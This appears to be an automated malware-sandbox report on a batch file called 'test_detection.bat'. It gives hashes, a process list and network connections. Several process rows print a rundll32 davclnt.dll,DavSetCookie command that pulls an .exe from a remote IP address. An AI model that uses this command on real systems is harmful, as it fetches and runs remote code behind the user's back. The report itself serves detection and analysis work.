| File name: | test_detection.bat |
| Full analysis: | https://app.any.run/tasks/adbd2685-2e48-4ee4-bca2-418ff58b218c |
| Verdict: | Malicious activity |
| Analysis date: | September 05, 2023, 08:29:18 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Indicators: | |
| MIME: | text/plain |
| File info: | ASCII text, with no line terminators |
| MD5: | FD42132B6F9DA300C14C87E615320404 |
| SHA1: | 8CB4464F93B05CB7C1D57C68259D6DF5BBEEEF5E |
| SHA256: | C360A912E5C89F40FB0CBD2F92693175107DD9712A20191EEBED470252A55E28 |
| SSDEEP: | 3:m6L4AcfRJcWtlGJLRL/HgnRmKTa/m1Q/mdossjuVG:m6kjfRLeAnRmKZNsyVG |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 768 | rundll32.exe C:\WINDOWS\system32\davclnt.dll,DavSetCookie 24.199.119.192@80 http://24.199.119.192/cdn/7550167544/8855767801.exe | C:\Windows\System32\rundll32.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 2250 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1200 | rundll32.exe C:\WINDOWS\system32\davclnt.dll,DavSetCookie 24.199.119.192@80 http://24.199.119.192/cdn/7550167544/8855767801.exe | C:\Windows\System32\rundll32.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 2250 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2320 | "C:\Windows\System32\NOTEPAD.EXE" C:\Users\admin\Desktop\test_detection.bat | C:\Windows\System32\notepad.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Notepad Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2520 | rundll32.exe | C:\Windows\System32\rundll32.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2576 | rundll32.exe davclnt.dll,DavSetCookie 24.199.119.192@80 http://24.199.119.192/cdn/7550167544/8855767801.exe | C:\Windows\System32\rundll32.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 2250 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2760 | "cmd.exe" /s /k pushd "C:\Users\admin\Desktop" | C:\Windows\System32\cmd.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 3748 | C:\Windows\system32\cmd.exe /c ""C:\Users\admin\Desktop\test_detection.bat" " | C:\Windows\System32\cmd.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 2250 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
3284 | svchost.exe | 239.255.255.250:1900 | — | — | — | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |